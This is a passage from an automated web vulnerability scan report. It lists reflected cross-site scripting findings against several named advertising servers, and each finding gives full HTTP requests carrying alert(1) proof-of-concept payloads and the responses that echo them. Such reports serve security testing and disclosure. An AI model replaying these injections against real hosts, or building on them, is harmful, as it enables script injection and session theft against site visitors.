GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01953fd"-alert(1)-"fc853a13bb5&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AB745F49A27F9C118C4B77DBDA5CBC4D; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:28 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01953fd"-alert(1)-"fc853a13bb5&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnuoc"

...[SNIP]...

4.84. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the plc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d49fd"-alert(1)-"4081b4f6950 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tld49fd"-alert(1)-"4081b4f6950&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FF3442D093E020CD38F3DBB93D3DD6A; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:31 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tld49fd"-alert(1)-"4081b4f6950&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnwjd"
};

(function(){var N="3.11.1";var v=(adsafeVisParams
...[SNIP]...

4.85. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62f52"-alert(1)-"d0677c8a65a was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=72862f52"-alert(1)-"d0677c8a65a&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=http%3A%2F%2Fdeals.nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7DB9AE13B83BA6BB678DE1EE54E88BED; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:30 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://tag.admeld.com/ad/iframe/725/nydailynews/728x90/nydnros_atf?t=1313102357262&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com
...[SNIP]...
nydailynews.com%2Fpublishers%2F151%2Fconsumer_password_resets%2Fnew",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=72862f52"-alert(1)-"d0677c8a65a&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "grqmnvys"
};

(function(){var N="3.11.1";var v=(ads
...[SNIP]...

4.86. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe0a5'%3balert(1)//ef5e54119c7 was submitted in the redir parameter. This input was echoed as fe0a5';alert(1)//ef5e54119c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=988&inv_code=ns.informit&size=728x90&imp_id=ns-10313865974_1314813273,12244bc34a8b1dc&referrer=http%3A%2F%2Fwww.informit.com%2Findex.aspx%3F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fns.informit%2Fhomepage%3Bnet%3Dns%3Bu%3D%2Cns-10313865974_1314813273%2C12244bc34a8b1dc%2Citdeweb%2Cax.{PRICEBUCKET}%3B%3Bppos%3Datf%3Bkw%3D%3Btile%3D1%3Bcmw%3Dnurl%3Bsz%3D728x90%3Bnet%3Dns%3Bord1%3D418181%3Bcontx%3Ditdeweb%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D3538776447530836%3F%3Ffe0a5'%3balert(1)//ef5e54119c7 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.informit.com/index.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 01-Sep-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6422714091563403120; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb14588=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChIIzagDEAoYCCAIKAgw_er58gQKEgjAqQMQChgRIBEoETD_6vnyBBD_6vnyBBgY; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb210431=lbMRZkI/7Zw@!%#Qz[m]b91JX?enc=Z2ZmZmZm-j9OYhBYObT2PwAAAAAAAPg_TmIQWDm09j9mZmZmZmb6P9-RjzZyG0FacEeI8W8QIll_dV5OAAAAADgbCADcAwAAZAAAAAIAAAC2awgANCcBAAEAAABVU0QAVVNEANgCWgA7JQAAnhQBAgUCAQUAAAAAYh7Y6wAAAAA.&tt_code=ns.informit&udj=uf%28%27a%27%2C+27%2C+1314813311%29%3Buf%28%27g%27%2C+1079%2C+1314813311%29%3Buf%28%27r%27%2C+551862%2C+1314813311%29%3Bppv%2882%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2884%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2811%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2882%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3Bppv%2884%2C+%276503509514255307231%27%2C+1314813311%2C+1325181311%2C+66647%2C+75572%29%3B&cnd=!ByLNcwjXiAQQttchGAAgtM4EMAE4u0pAAEhkULi2IFgAYHhoAHAAeACAAQCIAQCQAQGYAQGgAQKoAQOwAQC5AWdmZmZmZvo_wQFnZmZmZmb6P8kBmpmZmZmZ8T_ZAQAAAAAAAPA_4AHhHQ..&ccd=!6AQyKAjXiAQQttchGLTOBCAA&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E66647&media_subtypes=1; path=/; expires=Thu, 01-Sep-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip4FV-GK]#_gAU+]VCVUo?#tv8d''iQ#; path=/; expires=Tue, 29-Nov-2011 17:55:11 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 31 Aug 2011 17:55:11 GMT
Content-Length: 329

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/ns.informit/homepage;net=ns;u=,ns-10313865974_1314813273,12244bc34a8b1dc,itdeweb,ax.140;;ppos=atf;kw=;tile=1;cmw=nurl;sz=728x90;net=ns;ord1=418181;contx=itdeweb;an=140;dc=w;btg=;ord=3538776447530836??fe0a5';alert(1)//ef5e54119c7">
...[SNIP]...

4.87. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [imp_rvr_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2c8a"%3balert(1)//155cfbc0af0 was submitted in the imp_rvr_id parameter. This input was echoed as b2c8a";alert(1)//155cfbc0af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-2042-17%2F4%3Fmpt%3D1313102123%257D%26siteid%3D0%26Perf_Tracker_1%3D0000805764%26Perf_Tracker_2%3D0001017406%26Perf_Tracker_3%3D1183%26ext_id%3D8943316258680174705%26adid%3D344452%26fcid%3D344442%26ir_DAP_I131%3D1%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fa69d671310a47a24716fb1ff91af9850226d6e%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3DTunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE%26ir_DAP_I130%3D%26ir_DAP_U30%3D3%26ir_DAP_I101%3D0%26ir_DAP_U38%3D9%26ir_DAP_U31%3Du%26ir_DAP_U26%3Dtrue%26ir_DAP_U25%3Dfalse%26ir_DAP_U24%3Dfalse%26ir_DAP_U33%3D4%26ir_DAP_I105%3D0%26ir_DAP_U34%3D1%26ir_DAP_U32%3DC%26ir_DAP_I106%3D0%26ir_DAP_U35%3D02018-0250%26rvr_id%3D254966832407%26imp_rvr_id%3D254966832407&mpt=1313102123%7D&siteid=0&Perf_Tracker_1=0000805764&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183&ext_id=8943316258680174705&adid=344452&fcid=344442&ir_DAP_I131=1&ir_DAP_I132=1&ir_DAP_I133=8fa69d671310a47a24716fb1ff91af9850226d6e&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=TunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE&ir_DAP_I130=&ir_DAP_U30=3&ir_DAP_I101=0&ir_DAP_U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254966832407&imp_rvr_id=254966832407b2c8a"%3balert(1)//155cfbc0af0&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAHF4m-jACh18-HCZRD1jHzErWUROAAAAAJVwCABkAAAAZAAAAAIAAADkaggAh7wAAAEAAABVU0QAVVNEACwB-gDBSwAAfxAAAgMCAQUAAAAA2xJ-oQAAAAA.%2Fcnd%3D%21ZQWDLQj4uwIQ5NUhGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F725%252Fnydailynews%252F300x250%252Fnydnros_btf%253Ft%253D1313102150278%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.nydailynews.com%25252Findex.html%2526refer%253D%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000805764%252Fmnum%253D0001017406%252Fcstr%253D2758506%253D_4e445926%252C6612185646%252C805764%255E1017406%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D2758506%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=3484:15222/9609:2042/17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:42:56 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 5460
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck254966832407b2c8a";alert(1)//155cfbc0af0\">" );
var rvr_id=254966832407b2c8a";alert(1)//155cfbc0af0;
var mpserv;

...[SNIP]...

4.88. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4056"%3balert(1)//963aa907825 was submitted in the mpck parameter. This input was echoed as d4056";alert(1)//963aa907825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-2042-17%2F4%3Fmpt%3D1313102123%257D%26siteid%3D0%26Perf_Tracker_1%3D0000805764%26Perf_Tracker_2%3D0001017406%26Perf_Tracker_3%3D1183%26ext_id%3D8943316258680174705%26adid%3D344452%26fcid%3D344442%26ir_DAP_I131%3D1%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fa69d671310a47a24716fb1ff91af9850226d6e%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3DTunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE%26ir_DAP_I130%3D%26ir_DAP_U30%3D3%26ir_DAP_I101%3D0%26ir_DAP_U38%3D9%26ir_DAP_U31%3Du%26ir_DAP_U26%3Dtrue%26ir_DAP_U25%3Dfalse%26ir_DAP_U24%3Dfalse%26ir_DAP_U33%3D4%26ir_DAP_I105%3D0%26ir_DAP_U34%3D1%26ir_DAP_U32%3DC%26ir_DAP_I106%3D0%26ir_DAP_U35%3D02018-0250%26rvr_id%3D254966832407%26imp_rvr_id%3D254966832407d4056"%3balert(1)//963aa907825&mpt=1313102123%7D&siteid=0&Perf_Tracker_1=0000805764&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183&ext_id=8943316258680174705&adid=344452&fcid=344442&ir_DAP_I131=1&ir_DAP_I132=1&ir_DAP_I133=8fa69d671310a47a24716fb1ff91af9850226d6e&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=TunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE&ir_DAP_I130=&ir_DAP_U30=3&ir_DAP_I101=0&ir_DAP_U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254966832407&imp_rvr_id=254966832407&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAHF4m-jACh18-HCZRD1jHzErWUROAAAAAJVwCABkAAAAZAAAAAIAAADkaggAh7wAAAEAAABVU0QAVVNEACwB-gDBSwAAfxAAAgMCAQUAAAAA2xJ-oQAAAAA.%2Fcnd%3D%21ZQWDLQj4uwIQ5NUhGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F725%252Fnydailynews%252F300x250%252Fnydnros_btf%253Ft%253D1313102150278%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.nydailynews.com%25252Findex.html%2526refer%253D%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000805764%252Fmnum%253D0001017406%252Fcstr%253D2758506%253D_4e445926%252C6612185646%252C805764%255E1017406%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D2758506%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=3484:15222/9609:2042/17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:37:56 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 5462
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck254966832407\">" );
var rvr_id=254966832407;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254966832407&imp_rvr_id=254966832407d4056";alert(1)//963aa907825";
var mpcke="<mpcke/>
...[SNIP]...

4.89. http://img.mediaplex.com/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b198d"%3balert(1)//6c031280ac6 was submitted in the mpvc parameter. This input was echoed as b198d";alert(1)//6c031280ac6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-2042-17%2F4%3Fmpt%3D1313102123%257D%26siteid%3D0%26Perf_Tracker_1%3D0000805764%26Perf_Tracker_2%3D0001017406%26Perf_Tracker_3%3D1183%26ext_id%3D8943316258680174705%26adid%3D344452%26fcid%3D344442%26ir_DAP_I131%3D1%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fa69d671310a47a24716fb1ff91af9850226d6e%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3DTunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE%26ir_DAP_I130%3D%26ir_DAP_U30%3D3%26ir_DAP_I101%3D0%26ir_DAP_U38%3D9%26ir_DAP_U31%3Du%26ir_DAP_U26%3Dtrue%26ir_DAP_U25%3Dfalse%26ir_DAP_U24%3Dfalse%26ir_DAP_U33%3D4%26ir_DAP_I105%3D0%26ir_DAP_U34%3D1%26ir_DAP_U32%3DC%26ir_DAP_I106%3D0%26ir_DAP_U35%3D02018-0250%26rvr_id%3D254966832407%26imp_rvr_id%3D254966832407&mpt=1313102123%7D&siteid=0&Perf_Tracker_1=0000805764&Perf_Tracker_2=0001017406&Perf_Tracker_3=1183&ext_id=8943316258680174705&adid=344452&fcid=344442&ir_DAP_I131=1&ir_DAP_I132=1&ir_DAP_I133=8fa69d671310a47a24716fb1ff91af9850226d6e&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=TunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE&ir_DAP_I130=&ir_DAP_U30=3&ir_DAP_I101=0&ir_DAP_U38=9&ir_DAP_U31=u&ir_DAP_U26=true&ir_DAP_U25=false&ir_DAP_U24=false&ir_DAP_U33=4&ir_DAP_I105=0&ir_DAP_U34=1&ir_DAP_U32=C&ir_DAP_I106=0&ir_DAP_U35=02018-0250&rvr_id=254966832407&imp_rvr_id=254966832407&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAHF4m-jACh18-HCZRD1jHzErWUROAAAAAJVwCABkAAAAZAAAAAIAAADkaggAh7wAAAEAAABVU0QAVVNEACwB-gDBSwAAfxAAAgMCAQUAAAAA2xJ-oQAAAAA.%2Fcnd%3D%21ZQWDLQj4uwIQ5NUhGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F725%252Fnydailynews%252F300x250%252Fnydnros_btf%253Ft%253D1313102150278%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.nydailynews.com%25252Findex.html%2526refer%253D%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000805764%252Fmnum%253D0001017406%252Fcstr%253D2758506%253D_4e445926%252C6612185646%252C805764%255E1017406%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D2758506%252Foptn%253D64%253Ftrg%253Db198d"%3balert(1)//6c031280ac6 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/300x250/nydnros_btf?t=1313102150278&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=014937087076; mojo3=3484:15222/9609:2042/17243:27909/12309:21584

Response

HTTP/1.1 200 OK
Date: Thu, 11 Aug 2011 22:43:12 GMT
Server: Apache
Last-Modified: Fri, 15 Jul 2011 22:25:49 GMT
ETag: "765a59-9f8-4a82321aab540"
Accept-Ranges: bytes
Content-Length: 5462
Content-Type: application/x-javascript

document.write( " <div id=\"foldcheck254966832407\">" );
var rvr_id=254966832407;
var mpserv;
var mpi="img-cdn.mediaplex.com/0/";

...[SNIP]...
advertising.com%2Fclick%2Fsite%3D0000805764%2Fmnum%3D0001017406%2Fcstr%3D2758506%3D_4e445926%2C6612185646%2C805764%5E1017406%5E1183%5E0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D2758506%2Foptn%3D64%3Ftrg%3Db198d";alert(1)//6c031280ac6";
var bangmpvc="http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAHF4m-jACh18-HCZRD1jHzErWUROAAAAAJVwCABkAAAAZAAAAAIAAADkaggAh7wAAAEAAABVU0QAVVNE
...[SNIP]...

4.90. http://img.mediaplex.com/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js [imp_rvr_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js

Issue detail

The value of the imp_rvr_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 976a0"%3balert(1)//3e2ec7b7f61 was submitted in the imp_rvr_id parameter. This input was echoed as 976a0";alert(1)//3e2ec7b7f61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/131750/83647_US_2011_Q3_Pattern_Default_728x90.js?mpck=rover.ebay.com%2Frover%2F1%2F711-131750-2042-16%2F4%3Fmpt%3D1313102326%257D%26siteid%3D0%26Perf_Tracker_1%3D0000805760%26Perf_Tracker_2%3D0001017409%26Perf_Tracker_3%3D1183%26ext_id%3D7512285371244257491%26adid%3D344472%26fcid%3D344462%26ir_DAP_I131%3D1%26ir_DAP_I132%3D1%26ir_DAP_I133%3D8fa69d671310a47a24716fb1ff91af9850258caf%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3DTunvMYy0ONY13qj8e5tm6x7MF9sx-xk_ab2EJiD0iUE%26ir_DAP_I130%3D%26ir_DAP_U30%3D3%26ir_DAP_I101%3D0%26ir_DAP_U38%3D9%26ir_DAP_U31%3Du%26ir_DAP_U26%3Dtrue%26ir_DAP_U25%3Dfalse%26ir_DAP_U24%3Dfalse%26ir_DAP_U33%3D4%26ir_DAP_I105%3D0%26ir_DAP_U34%3D1%26ir_DAP_U32%3DC%26ir_DAP_I106%3D0%26ir_DAP_U35%3D02018-0250%26rvr_id%3D254960678256%26imp_rvr_id%3D2